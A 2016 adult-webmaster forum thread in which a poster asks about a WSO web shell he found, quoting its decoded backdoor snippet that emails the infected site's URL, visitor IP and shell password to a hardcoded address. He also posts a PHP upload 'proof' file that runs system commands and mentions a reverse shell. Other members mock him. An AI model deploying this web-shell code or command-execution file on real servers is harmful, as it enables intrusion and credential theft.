Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 05-06-2016, 10:06 PM   #1
deonbell
Confirmed User
 
deonbell's Avatar
 
Industry Role:
Join Date: Sep 2015
Posts: 1,045
What is this php?

PHP Code:
$visitc $_COOKIE["visits"];
if (
$visitc == "") {
  
$visitc  0;
  
$visitor $_SERVER["REMOTE_ADDR"];
  
$web     $_SERVER["HTTP_HOST"];
  
$inj     $_SERVER["REQUEST_URI"];
  
$target  rawurldecode($web.$inj);
  
$judul   "WSO 2.6 http://$target by $visitor";
  
$body    "Bug: $target by $visitor - $auth_pass";
  if (!empty(
$web)) { @mail("[email protected]",$judul,$body,$auth_pass); }


I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.
deonbell is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-06-2016, 10:11 PM   #2
Spunky
I need a beer
 
Spunky's Avatar
 
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,906
It will never work
__________________
Spunky is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-06-2016, 10:30 PM   #3
deonbell
Confirmed User
 
deonbell's Avatar
 
Industry Role:
Join Date: Sep 2015
Posts: 1,045
Quote:
Originally Posted by Spunky View Post
It will never work
Yes, I try pentest monkey shell and it not work at all. I delete base64 code from 404.php shell. I hope no more backdoors. And it works on old server running old php 5.5, but not on server with php 7. Maybe 404 php code defecated in php 7.

Thank for your help Spunky.
deonbell is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-06-2016, 10:48 PM   #4
Spunky
I need a beer
 
Spunky's Avatar
 
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,906
I try to help the peoples
__________________
Spunky is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 03:17 AM   #5
clickity click
So Fecking Bummed
 
Industry Role:
Join Date: Aug 2014
Posts: 3,682
Quote:
Originally Posted by deonbell View Post
PHP Code:
$visitc $_COOKIE["visits"];
if (
$visitc == "") {
  
$visitc  0;
  
$visitor $_SERVER["REMOTE_ADDR"];
  
$web     $_SERVER["HTTP_HOST"];
  
$inj     $_SERVER["REQUEST_URI"];
  
$target  rawurldecode($web.$inj);
  
$judul   "WSO 2.6 http://$target by $visitor";
  
$body    "Bug: $target by $visitor - $auth_pass";
  if (!empty(
$web)) { @mail("[email protected]",$judul,$body,$auth_pass); }


I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

Here is all code.
"404 Not Found" By aLLiGaToR - Pastebin.com
Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

I only use code for good. I want to be a white hacker.
What do you want to do with the shell?
clickity click is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 03:22 AM   #6
HomerSimpson
Too lazy to set a custom title
 
HomerSimpson's Avatar
 
Industry Role:
Join Date: Sep 2005
Location: Springfield
Posts: 13,826
When I try to open that pastebin my NOD32 says:
__________________
Make a bank with Chaturbate - the best selling webcam program
Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:
HomerSimpson is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 04:19 AM   #7
clickity click
So Fecking Bummed
 
Industry Role:
Join Date: Aug 2014
Posts: 3,682
Quote:
Originally Posted by HomerSimpson View Post
When I try to open that pastebin my NOD32 says:
Well duh. It's a web shell.
clickity click is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 06:23 AM   #8
CPA-Rush
small trip to underworld
 
Industry Role:
Join Date: Mar 2012
Location: first gen intel 80386/nintendo-gb/arcade/ps1/internet person
Posts: 4,927
https://github.com/rogierkn/PrettyBoot
__________________

automatic exchange - paxum , bitcoin,pm, payza

. daizzzy signbucks caution will black-hat black-hat your traffic

ignored forever :zuzana designs
CPA-Rush is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 06:49 AM   #9
Barry-xlovecam
It's 42
 
Industry Role:
Join Date: Jun 2010
Location: Global
Posts: 18,083
Happy Hacking
k0d3k1dd13
Barry-xlovecam is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 11:53 AM   #10
deonbell
Confirmed User
 
deonbell's Avatar
 
Industry Role:
Join Date: Sep 2015
Posts: 1,045
I think I don't need nice shell for proof of conception. I create a php file that shows I upload. I want to upload this to facebook or google and get money for finding bug. I will make similar files for asp and js. Then I get a money to buy new roller blades.

PHP Code:
<?php

echo "<h1>proof</h1>";
echo 
"<h1>who?</h1>";
system("who");
echo 
"<h2>Current Directory</h2>";
system("pwd");
echo 
"<h2>Files</h2>";
system("ls");
echo 
"<h2>Uname</h2>";
system("uname -a");


?>
deonbell is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-07-2016, 11:58 AM   #11
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,224
People doing code bounties don't have to ask questions like this..
__________________
Join the BEST cam affiliate program on the internet!
I've referred over $1.7mil in spending this past year, you should join in.
I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
Colmike9 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks

Tags
code, $visitc, $target, $visitor, base64, encoded, e-mail, password, hacker, white, shell, reverse, line, delete, monkeys, pentest, application, $_server[request_uri];, $inj, rawurldecode$web.$inj;, $judul, wso, $_server[http_host];, $web, $_cookie[visits];



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.